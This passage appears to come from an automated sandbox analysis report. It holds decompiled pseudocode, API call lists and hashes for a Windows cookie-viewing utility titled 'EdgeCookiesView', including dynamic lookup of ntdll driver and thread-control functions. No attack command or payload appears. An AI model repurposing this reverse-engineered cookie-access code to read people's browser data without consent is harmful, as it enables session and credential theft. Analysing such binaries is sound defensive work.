						_t81 = _t229 + 0x74;
						 *_t81 =  *(_t229 + 0x74) - 1;
					} while ( *_t81 != 0);
					goto L5;
				}
			}
Instruction address column of the disassembly listing (0x0040a743 through 0x0040ab6d, returning to 0x0040a973-0x0040a995); the instruction text for these addresses is not present in this extract.

APIs
  • Part of subcall function 00406AFA: LoadMenuW.USER32 ref: 00406B02
• SetMenu.USER32(?,00000000), ref: 0040A84F
• CreateStatusWindowW.COMCTL32(50000000,0040F454,?,00000101), ref: 0040A86A
• SendMessageW.USER32(00000000,00000404,00000001,?), ref: 0040A888
  • Part of subcall function 00405F82: GetModuleHandleW.KERNEL32(00000000), ref: 00405F8E
  • Part of subcall function 00405F82: LoadImageW.USER32 ref: 00405F9F
  • Part of subcall function 00405F82: GetObjectW.GDI32(?,00000018,?), ref: 00405FBE
  • Part of subcall function 00405F82: CreateCompatibleDC.GDI32(00000000), ref: 00405FC5
  • Part of subcall function 00405F82: SelectObject.GDI32(00000000,?), ref: 00405FD1
  • Part of subcall function 00405F82: GetSysColor.USER32(0000000F), ref: 00405FDC
  • Part of subcall function 00405F82: GetPixel.GDI32(00000000,00000000,00000000), ref: 00405FEE
  • Part of subcall function 00405F82: GetPixel.GDI32(00000000,?,?), ref: 0040600A
  • Part of subcall function 00405F82: SetPixel.GDI32(00000000,?,?,?), ref: 0040601B
  • Part of subcall function 00405F82: SelectObject.GDI32(00000000,?), ref: 0040603B
  • Part of subcall function 00405F82: DeleteDC.GDI32(00000000), ref: 00406042
• CreateToolbarEx.COMCTL32(?,50010900,00000102,00000006,00000000,00000000,?,00000007,00000010,00000010,00000060,00000010,00000014), ref: 0040A8B5
• ImageList_Create.COMCTL32(00000010,00000010,00000018,00000000,00000001), ref: 0040A8CA
  • Part of subcall function 00402DE1: GetModuleHandleW.KERNEL32(00000000,0000006E,00000000,00000000,00000000,00001060), ref: 00402DFA
  • Part of subcall function 00402DE1: LoadImageW.USER32 ref: 00402E01
  • Part of subcall function 00402DE1: GetObjectW.GDI32(?,00000018,?), ref: 00402E25
  • Part of subcall function 00402DE1: CreateCompatibleDC.GDI32(00000000), ref: 00402E2C
  • Part of subcall function 00402DE1: SelectObject.GDI32(00000000,?), ref: 00402E39
  • Part of subcall function 00402DE1: GetSysColor.USER32(0000000F), ref: 00402E45
  • Part of subcall function 00402DE1: GetPixel.GDI32(00000000,00000000,00000000), ref: 00402E58
  • Part of subcall function 00402DE1: GetPixel.GDI32(00000000,?,?), ref: 00402E83
  • Part of subcall function 00402DE1: SetPixel.GDI32(00000000,?,?,?), ref: 00402F00
  • Part of subcall function 00402DE1: SelectObject.GDI32(00000000,?), ref: 00402F2F
  • Part of subcall function 00402DE1: DeleteDC.GDI32(00000000), ref: 00402F36
• ImageList_Add.COMCTL32(?,00000000,00000000), ref: 0040A8E0
• DeleteObject.GDI32(?), ref: 0040A8E9
• SendMessageW.USER32(?,00000436,00000000,?), ref: 0040A8FE
• GetModuleHandleW.KERNEL32(00000000), ref: 0040A919
• CreateWindowExW.USER32 ref: 0040A940
• GetModuleHandleW.KERNEL32(00000000,00000000,00000001), ref: 0040A9BA
• LoadIconW.USER32(00000000,00000066), ref: 0040A9C3
• ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 0040A9D1
• memcpy.MSVCRT ref: 0040AA22
• ShowWindow.USER32(?,?), ref: 0040AA58
• GetFileAttributesW.KERNEL32(004134E0), ref: 0040AA89
• GetTempPathW.KERNEL32(00000104,004134E0), ref: 0040AA99
• wcslen.MSVCRT ref: 0040AAA0
• wcslen.MSVCRT ref: 0040AAAE
                                                                                                                                                • RegisterWindowMessageW.USER32(commdlg_FindReplace,00000001), ref: 0040AB0D
                                                                                                                                                • SendMessageW.USER32(?,00000404,00000002,?), ref: 0040AB45
                                                                                                                                                • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 0040AB58
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Object$CreatePixel$ImageMessage$HandleLoadModuleSelectSendWindow$DeleteList_$ColorCompatibleIconMenuwcslen$AttributesFilePathRegisterReplaceShowStatusTempToolbarmemcpy
                                                                                                                                                • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$4A
                                                                                                                                                • API String ID: 945479791-4224175941
                                                                                                                                                • Opcode ID: 04a5916b9d1b1c31dadef9f7ad9415178030fb231d71024c6285b7e26b69c7e2
                                                                                                                                                • Instruction ID: ef4bcdae66b01cb0e556df410aa057252edbff8cd3310fcf9c61045b6203d9f2
                                                                                                                                                • Opcode Fuzzy Hash: 04a5916b9d1b1c31dadef9f7ad9415178030fb231d71024c6285b7e26b69c7e2
                                                                                                                                                • Instruction Fuzzy Hash: 35C1C271640344AFEB21DF64CC89FDA3BA5AF54304F04447AFE48AB2A2C7B59844CB69
                                                                                                                                                 Uniqueness
                                                                                                                                                 • Uniqueness Score: -1.00%
                                                                                                                                                C-Code - Quality: 85%
                                                                                                                                                			E004010C7(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
                                                                                                                                                				struct tagPOINT _v12;
                                                                                                                                                				void* __esi;
                                                                                                                                                				void* _t47;
                                                                                                                                                				struct HBRUSH__* _t56;
                                                                                                                                                				void* _t61;
                                                                                                                                                				unsigned int _t63;
                                                                                                                                                				void* _t68;
                                                                                                                                                				struct HWND__* _t69;
                                                                                                                                                				struct HWND__* _t70;
                                                                                                                                                				void* _t73;
                                                                                                                                                				unsigned int _t74;
                                                                                                                                                				struct HWND__* _t76;
                                                                                                                                                				struct HWND__* _t77;
                                                                                                                                                				struct HWND__* _t78;
                                                                                                                                                				struct HWND__* _t79;
                                                                                                                                                				unsigned int _t85;
                                                                                                                                                				struct HWND__* _t87;
                                                                                                                                                				struct HWND__* _t89;
                                                                                                                                                				struct HWND__* _t90;
                                                                                                                                                				struct tagPOINT _t96;
                                                                                                                                                				struct tagPOINT _t98;
                                                                                                                                                				signed short _t103;
                                                                                                                                                				void* _t106;
                                                                                                                                                				void* _t117;
                                                                                                                                                
                                                                                                                                                				_t106 = __edx;
                                                                                                                                                				_push(__ecx);
                                                                                                                                                				_push(__ecx);
                                                                                                                                                				_t47 = _a4 - 0x110;
                                                                                                                                                				_t117 = __ecx;
                                                                                                                                                				if(_t47 == 0) {
                                                                                                                                                					__eflags =  *0x412f50;
                                                                                                                                                					if(__eflags != 0) {
                                                                                                                                                						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x412f50);
                                                                                                                                                					} else {
                                                                                                                                                						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
                                                                                                                                                						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
                                                                                                                                                					}
                                                                                                                                                					SetWindowTextW( *(_t117 + 0x10), L"EdgeCookiesView");
                                                                                                                                                					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
                                                                                                                                                					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
                                                                                                                                                					E0040103E(_t117, __eflags);
                                                                                                                                                					E00405B17(_t106,  *(_t117 + 0x10), 4);
                                                                                                                                                					goto L30;
                                                                                                                                                				} else {
                                                                                                                                                					_t61 = _t47 - 1;
                                                                                                                                                					if(_t61 == 0) {
                                                                                                                                                						_t103 = _a8;
                                                                                                                                                						_t63 = _t103 >> 0x10;
                                                                                                                                                						__eflags = _t103 - 1;
                                                                                                                                                						if(_t103 == 1) {
                                                                                                                                                							L24:
                                                                                                                                                							__eflags = _t63;
                                                                                                                                                							if(_t63 != 0) {
                                                                                                                                                								goto L30;
                                                                                                                                                							} else {
                                                                                                                                                								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
                                                                                                                                                								DeleteObject( *(_t117 + 0x43c));
                                                                                                                                                								goto L8;
                                                                                                                                                							}
                                                                                                                                                						} else {
                                                                                                                                                							__eflags = _t103 - 2;
                                                                                                                                                							if(_t103 != 2) {
                                                                                                                                                								goto L30;
                                                                                                                                                							} else {
                                                                                                                                                								goto L24;
                                                                                                                                                							}
                                                                                                                                                						}
                                                                                                                                                					} else {
                                                                                                                                                						_t68 = _t61 - 0x27;
                                                                                                                                                						if(_t68 == 0) {
                                                                                                                                                							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                                                                							__eflags = _a12 - _t69;
                                                                                                                                                							if(_a12 != _t69) {
                                                                                                                                                								__eflags =  *0x412fd0;
                                                                                                                                                								if( *0x412fd0 == 0) {
                                                                                                                                                									goto L30;
                                                                                                                                                								} else {
                                                                                                                                                									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                                                                									__eflags = _a12 - _t70;
                                                                                                                                                									if(_a12 != _t70) {
                                                                                                                                                										goto L30;
                                                                                                                                                									} else {
                                                                                                                                                										goto L18;
                                                                                                                                                									}
                                                                                                                                                								}
                                                                                                                                                							} else {
                                                                                                                                                								L18:
                                                                                                                                                								SetBkMode(_a8, 1);
                                                                                                                                                								SetTextColor(_a8, 0xc00000);
                                                                                                                                                								_t56 = GetSysColorBrush(0xf);
                                                                                                                                                							}
                                                                                                                                                						} else {
                                                                                                                                                							_t73 = _t68 - 0xc8;
                                                                                                                                                							if(_t73 == 0) {
                                                                                                                                                								_t74 = _a12;
                                                                                                                                                								_t96 = _t74 & 0x0000ffff;
                                                                                                                                                								_v12.x = _t96;
                                                                                                                                                								_v12.y = _t74 >> 0x10;
                                                                                                                                                								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                                                                								_push(_v12.y);
                                                                                                                                                								_a8 = _t76;
                                                                                                                                                								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
                                                                                                                                                								__eflags = _t77 - _a8;
                                                                                                                                                								if(_t77 != _a8) {
                                                                                                                                                									__eflags =  *0x412fd0;
                                                                                                                                                									if( *0x412fd0 == 0) {
                                                                                                                                                										goto L30;
                                                                                                                                                									} else {
                                                                                                                                                										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                                                                										_push(_v12.y);
                                                                                                                                                										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
                                                                                                                                                										__eflags = _t79 - _t78;
                                                                                                                                                										if(_t79 != _t78) {
                                                                                                                                                											goto L30;
                                                                                                                                                										} else {
                                                                                                                                                											goto L13;
                                                                                                                                                										}
                                                                                                                                                									}
                                                                                                                                                								} else {
                                                                                                                                                									L13:
                                                                                                                                                									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
                                                                                                                                                									goto L8;
                                                                                                                                                								}
                                                                                                                                                							} else {
                                                                                                                                                								if(_t73 != 0) {
                                                                                                                                                									L30:
                                                                                                                                                									_t56 = 0;
                                                                                                                                                									__eflags = 0;
                                                                                                                                                								} else {
                                                                                                                                                									_t85 = _a12;
                                                                                                                                                									_t98 = _t85 & 0x0000ffff;
                                                                                                                                                									_v12.x = _t98;
                                                                                                                                                									_v12.y = _t85 >> 0x10;
                                                                                                                                                									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                                                                									_push(_v12.y);
									_a8 = _t87;
									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
										__eflags =  *0x412fd0;
										if( *0x412fd0 == 0) {
											goto L30;
										} else {
											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
											_push(_v12.y);
											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
											__eflags = _t90 - _t89;
											if(_t90 != _t89) {
												goto L30;
											} else {
												_push(0x412fd0);
												goto L7;
											}
										}
									} else {
										_push(_t117 + 0x23e);
										L7:
										_push( *(_t117 + 0x10));
										E00405CD2();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}

Instruction address column for the listing above (0x004010c7 to 0x00401337; entries of 0x00000000 mark lines without a mapped address).

Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
• String ID: EdgeCookiesView
• API String ID: 829165378-2656830938
• Opcode ID: c334951574b09e503c6ba9ad871ca57f87af409fc7462e6d36551130802c1d45
• Instruction ID: d9b36552e8d9c1158f8869abb926452dfc915059135fe28c0a7548d8f12e7aa6
• Opcode Fuzzy Hash: c334951574b09e503c6ba9ad871ca57f87af409fc7462e6d36551130802c1d45
• Instruction Fuzzy Hash: 87515A31500308EBEB31AF60DD44AAE7BB5FB44301F104A3AF951B69F0C778AD59AB08
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0040C41D() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x4132c4 == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x4132c4 = _t2;
					 *0x413294 = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x413298 = GetProcAddress( *0x4132c4, "NtLoadDriver");
					 *0x41329c = GetProcAddress( *0x4132c4, "NtUnloadDriver");
					 *0x4132a0 = GetProcAddress( *0x4132c4, "NtOpenSymbolicLinkObject");
					 *0x4132a4 = GetProcAddress( *0x4132c4, "NtQuerySymbolicLinkObject");
					 *0x4132a8 = GetProcAddress( *0x4132c4, "NtQueryObject");
					 *0x4132ac = GetProcAddress( *0x4132c4, "NtOpenThread");
					 *0x4132b0 = GetProcAddress( *0x4132c4, "NtClose");
					 *0x4132b4 = GetProcAddress( *0x4132c4, "NtQueryInformationThread");
					 *0x4132b8 = GetProcAddress( *0x4132c4, "NtSuspendThread");
					 *0x4132bc = GetProcAddress( *0x4132c4, "NtResumeThread");
					_t14 = GetProcAddress( *0x4132c4, "NtTerminateThread");
					 *0x4132c0 = _t14;
					return _t14;
				}
				return _t1;
			}
                                                                                                                                                0x0040c424
                                                                                                                                                0x0040c430
                                                                                                                                                0x0040c442
                                                                                                                                                0x0040c454
                                                                                                                                                0x0040c466
                                                                                                                                                0x0040c478
                                                                                                                                                0x0040c48a
                                                                                                                                                0x0040c49c
                                                                                                                                                0x0040c4ae
                                                                                                                                                0x0040c4c0
                                                                                                                                                0x0040c4d2
                                                                                                                                                0x0040c4e4
                                                                                                                                                0x0040c4f6
                                                                                                                                                0x0040c508
                                                                                                                                                0x0040c50d
                                                                                                                                                0x0040c50f
                                                                                                                                                0x00000000
                                                                                                                                                0x0040c514
                                                                                                                                                0x0040c515

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,?,0040C596,?,?,00000000), ref: 0040C430
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 0040C447
                                                                                                                                                • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0040C459
                                                                                                                                                • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0040C46B
                                                                                                                                                • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0040C47D
                                                                                                                                                • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0040C48F
                                                                                                                                                • GetProcAddress.KERNEL32(NtQueryObject), ref: 0040C4A1
                                                                                                                                                • GetProcAddress.KERNEL32(NtOpenThread), ref: 0040C4B3
                                                                                                                                                • GetProcAddress.KERNEL32(NtClose), ref: 0040C4C5
                                                                                                                                                • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 0040C4D7
                                                                                                                                                • GetProcAddress.KERNEL32(NtSuspendThread), ref: 0040C4E9
                                                                                                                                                • GetProcAddress.KERNEL32(NtResumeThread), ref: 0040C4FB
                                                                                                                                                • GetProcAddress.KERNEL32(NtTerminateThread), ref: 0040C50D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                                • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                                                                                                • API String ID: 667068680-4280973841
                                                                                                                                                • Opcode ID: 0eddc1e60b10c18c4745ef63ef14c7ef42ad6bc27fe304210325578cd75792ce
                                                                                                                                                • Instruction ID: 58691313bf47f16c5c12281129ebfbb01f3831da172bf8a538c636a3e5316245
                                                                                                                                                • Opcode Fuzzy Hash: 0eddc1e60b10c18c4745ef63ef14c7ef42ad6bc27fe304210325578cd75792ce
                                                                                                                                                • Instruction Fuzzy Hash: 27119778D41325AECB12BF71AD09ACA7EB1E764B5671084F7A408722F0D6B942A0DF4C
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 45%
                                                                                                                                                			E0040C0C7(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
                                                                                                                                                				void _v259;
                                                                                                                                                				void _v260;
                                                                                                                                                				void _v515;
                                                                                                                                                				void _v516;
                                                                                                                                                				char _v1048;
                                                                                                                                                				void _v1052;
                                                                                                                                                				void _v1056;
                                                                                                                                                				void _v1560;
                                                                                                                                                				long _v1580;
                                                                                                                                                				void _v3626;
                                                                                                                                                				char _v3628;
                                                                                                                                                				void _v5674;
                                                                                                                                                				char _v5676;
                                                                                                                                                				void _v9770;
                                                                                                                                                				short _v9772;
                                                                                                                                                				void* __edi;
                                                                                                                                                				void* _t45;
                                                                                                                                                				void* _t60;
                                                                                                                                                				int _t61;
                                                                                                                                                				int _t63;
                                                                                                                                                				int _t64;
                                                                                                                                                				long _t68;
                                                                                                                                                				struct HWND__* _t94;
                                                                                                                                                				signed int _t103;
                                                                                                                                                				intOrPtr _t127;
                                                                                                                                                				unsigned int _t130;
                                                                                                                                                				void* _t132;
                                                                                                                                                				void* _t135;
                                                                                                                                                
                                                                                                                                                				E0040E340(0x2628, __ecx);
                                                                                                                                                				_t45 = _a8 - 0x110;
                                                                                                                                                				if(_t45 == 0) {
                                                                                                                                                					E00405B17(__edx, _a4, 4);
                                                                                                                                                					_v9772 = 0;
                                                                                                                                                					memset( &_v9770, 0, 0xffe);
                                                                                                                                                					_t103 = 5;
                                                                                                                                                					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
                                                                                                                                                					memset( &_v1560, 0, 0x1f6);
                                                                                                                                                					_v260 = 0;
                                                                                                                                                					memset( &_v259, 0, 0xff);
                                                                                                                                                					_v516 = 0;
                                                                                                                                                					memset( &_v515, 0, 0xff);
                                                                                                                                                					_v5676 = 0;
                                                                                                                                                					memset( &_v5674, 0, 0x7fe);
                                                                                                                                                					_v3628 = 0;
                                                                                                                                                					memset( &_v3626, 0, 0x7fe);
                                                                                                                                                					_t135 = _t132 + 0x5c;
                                                                                                                                                					_t60 = GetCurrentProcess();
                                                                                                                                                					_t105 =  &_v260;
                                                                                                                                                					_a8 = _t60;
                                                                                                                                                					_t61 = ReadProcessMemory(_t60,  *0x41245c,  &_v260, 0x80, 0);
                                                                                                                                                					__eflags = _t61;
                                                                                                                                                					if(_t61 != 0) {
                                                                                                                                                						E00405D33( &_v5676,  &_v260, 4);
                                                                                                                                                						_pop(_t105);
                                                                                                                                                					}
                                                                                                                                                					_t63 = ReadProcessMemory(_a8,  *0x412450,  &_v516, 0x80, 0);
                                                                                                                                                					__eflags = _t63;
                                                                                                                                                					if(_t63 != 0) {
                                                                                                                                                						E00405D33( &_v3628,  &_v516, 0);
                                                                                                                                                						_pop(_t105);
                                                                                                                                                					}
                                                                                                                                                					_t64 = E0040591F();
                                                                                                                                                					__eflags = _t64;
                                                                                                                                                					if(_t64 == 0) {
                                                                                                                                                						E0040C9D6();
                                                                                                                                                					} else {
                                                                                                                                                						E0040CA5A();
                                                                                                                                                					}
                                                                                                                                                					__eflags =  *0x41325c; // 0x0
                                                                                                                                                					if(__eflags != 0) {
                                                                                                                                                						L17:
                                                                                                                                                						_v1056 = 0;
                                                                                                                                                						memset( &_v1052, 0, 0x218);
                                                                                                                                                						_t127 =  *0x412674; // 0x0
                                                                                                                                                						_t135 = _t135 + 0xc;
                                                                                                                                                						_t68 = GetCurrentProcessId();
                                                                                                                                                						_push(_t127);
                                                                                                                                                						_push(_t68);
                                                                                                                                                						 *0x4128ec = 0;
                                                                                                                                                						E0040CBD8(_t105, __eflags);
                                                                                                                                                						__eflags =  *0x4128ec; // 0x0
                                                                                                                                                						if(__eflags != 0) {
                                                                                                                                                							memcpy( &_v1056, 0x4128f0, 0x21c);
                                                                                                                                                							_t135 = _t135 + 0xc;
                                                                                                                                                							__eflags =  *0x4128ec; // 0x0
                                                                                                                                                							if(__eflags != 0) {
                                                                                                                                                								wcscpy( &_v1580, E00405888( &_v1048));
                                                                                                                                                							}
                                                                                                                                                						}
                                                                                                                                                						goto L20;
                                                                                                                                                					} else {
                                                                                                                                                						__eflags =  *0x413260; // 0x0
                                                                                                                                                						if(__eflags == 0) {
                                                                                                                                                							L20:
                                                                                                                                                							_push( &_v3628);
                                                                                                                                                							_push( &_v5676);
                                                                                                                                                							_push( *0x412450);
                                                                                                                                                							_push( *0x41245c);
                                                                                                                                                							_push( *0x41244c);
                                                                                                                                                							_push( *0x412434);
                                                                                                                                                							_push( *0x412438);
                                                                                                                                                							_push( *0x412440);
                                                                                                                                                							_push( *0x412444);
                                                                                                                                                							_push( *0x41243c);
                                                                                                                                                							_push( *0x412448);
                                                                                                                                                							_push( &_v1580);
                                                                                                                                                							_push( *0x412674);
                                                                                                                                                							_push( *0x412668);
                                                                                                                                                							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
                                                                                                                                                							_push(0x800);
                                                                                                                                                							_push( &_v9772);
                                                                                                                                                							L0040DFD6();
                                                                                                                                                							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
                                                                                                                                                							SetFocus(GetDlgItem(_a4, 0x3ea));
                                                                                                                                                							L21:
                                                                                                                                                							return 0;
                                                                                                                                                						}
                                                                                                                                                						goto L17;
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				if(_t45 == 1) {
                                                                                                                                                					_t130 = _a12;
                                                                                                                                                					if(_t130 >> 0x10 == 0) {
                                                                                                                                                						if(_t130 == 3) {
                                                                                                                                                							_t94 = GetDlgItem(_a4, 0x3ea);
                                                                                                                                                							_a4 = _t94;
                                                                                                                                                							SendMessageW(_t94, 0xb1, 0, 0xffff);
                                                                                                                                                							SendMessageW(_a4, 0x301, 0, 0);
                                                                                                                                                							SendMessageW(_a4, 0xb1, 0, 0);
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				goto L21;
                                                                                                                                                			}
                                                                                                                                                0x0040c0cf
                                                                                                                                                0x0040c0d7
                                                                                                                                                0x0040c0df
                                                                                                                                                0x0040c162
                                                                                                                                                0x0040c176
                                                                                                                                                0x0040c17d
                                                                                                                                                0x0040c184
                                                                                                                                                0x0040c19d
                                                                                                                                                0x0040c19f
                                                                                                                                                0x0040c1b2
                                                                                                                                                0x0040c1b8
                                                                                                                                                0x0040c1c6
                                                                                                                                                0x0040c1cc
                                                                                                                                                0x0040c1df
                                                                                                                                                0x0040c1e6
                                                                                                                                                0x0040c1f7
                                                                                                                                                0x0040c1fe
                                                                                                                                                0x0040c203
                                                                                                                                                0x0040c206
                                                                                                                                                0x0040c218
                                                                                                                                                0x0040c225
                                                                                                                                                0x0040c229
                                                                                                                                                0x0040c22b
                                                                                                                                                0x0040c22d
                                                                                                                                                0x0040c23e
                                                                                                                                                0x0040c244
                                                                                                                                                0x0040c244
                                                                                                                                                0x0040c25b
                                                                                                                                                0x0040c25d
                                                                                                                                                0x0040c25f
                                                                                                                                                0x0040c26f
                                                                                                                                                0x0040c275
                                                                                                                                                0x0040c275
                                                                                                                                                0x0040c276
                                                                                                                                                0x0040c27b
                                                                                                                                                0x0040c27d
                                                                                                                                                0x0040c286
                                                                                                                                                0x0040c27f
                                                                                                                                                0x0040c27f
                                                                                                                                                0x0040c27f
                                                                                                                                                0x0040c28b
                                                                                                                                                0x0040c291
                                                                                                                                                0x0040c29b
                                                                                                                                                0x0040c2a8
                                                                                                                                                0x0040c2ae
                                                                                                                                                0x0040c2b3
                                                                                                                                                0x0040c2b9
                                                                                                                                                0x0040c2bc
                                                                                                                                                0x0040c2c2
                                                                                                                                                0x0040c2c3
                                                                                                                                                0x0040c2c4
                                                                                                                                                0x0040c2ca
                                                                                                                                                0x0040c2cf
                                                                                                                                                0x0040c2d7
                                                                                                                                                0x0040c2ea
                                                                                                                                                0x0040c2ef
                                                                                                                                                0x0040c2f2
                                                                                                                                                0x0040c2f8
                                                                                                                                                0x0040c30d
                                                                                                                                                0x0040c313
                                                                                                                                                0x0040c2f8
                                                                                                                                                0x00000000
                                                                                                                                                0x0040c293
                                                                                                                                                0x0040c293
                                                                                                                                                0x0040c299
                                                                                                                                                0x0040c314
                                                                                                                                                0x0040c31a
                                                                                                                                                0x0040c321
                                                                                                                                                0x0040c322
                                                                                                                                                0x0040c32e
                                                                                                                                                0x0040c334
                                                                                                                                                0x0040c33a
                                                                                                                                                0x0040c340
                                                                                                                                                0x0040c346
                                                                                                                                                0x0040c34c
                                                                                                                                                0x0040c352
                                                                                                                                                0x0040c358
                                                                                                                                                0x0040c35e
                                                                                                                                                0x0040c35f
                                                                                                                                                0x0040c36b
                                                                                                                                                0x0040c371
                                                                                                                                                0x0040c376
                                                                                                                                                0x0040c37b
                                                                                                                                                0x0040c37c
                                                                                                                                                0x0040c394
                                                                                                                                                0x0040c3a5
                                                                                                                                                0x0040c3ab
                                                                                                                                                0x0040c3b1
                                                                                                                                                0x0040c3b1
                                                                                                                                                0x00000000
                                                                                                                                                0x0040c299
                                                                                                                                                0x0040c291
                                                                                                                                                0x0040c0e2
                                                                                                                                                0x0040c0e8
                                                                                                                                                0x0040c0f3
                                                                                                                                                0x0040c116
                                                                                                                                                0x0040c124
                                                                                                                                                0x0040c13f
                                                                                                                                                0x0040c142
                                                                                                                                                0x0040c14e
                                                                                                                                                0x0040c156
                                                                                                                                                0x0040c156
                                                                                                                                                0x0040c116
                                                                                                                                                0x0040c0f3
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 0040C371
                                                                                                                                                • {Unknown}, xrefs: 0040C191
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                • API String ID: 4111938811-1819279800
                                                                                                                                                • Opcode ID: 888bafc67b277ea66c09e682880ee55d231aecf6e6b028a468f373f7cbb56ac5
                                                                                                                                                • Instruction ID: 3431b055b2365f4bc913e86f7a298cdc42a4156783f6a5b9feadd91d66c4c499
                                                                                                                                                • Opcode Fuzzy Hash: 888bafc67b277ea66c09e682880ee55d231aecf6e6b028a468f373f7cbb56ac5
                                                                                                                                                • Instruction Fuzzy Hash: B271A3B2800119EEDB20AF51DD85EDA377CEB08354F0085BAF908F6191DA799E949F68
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

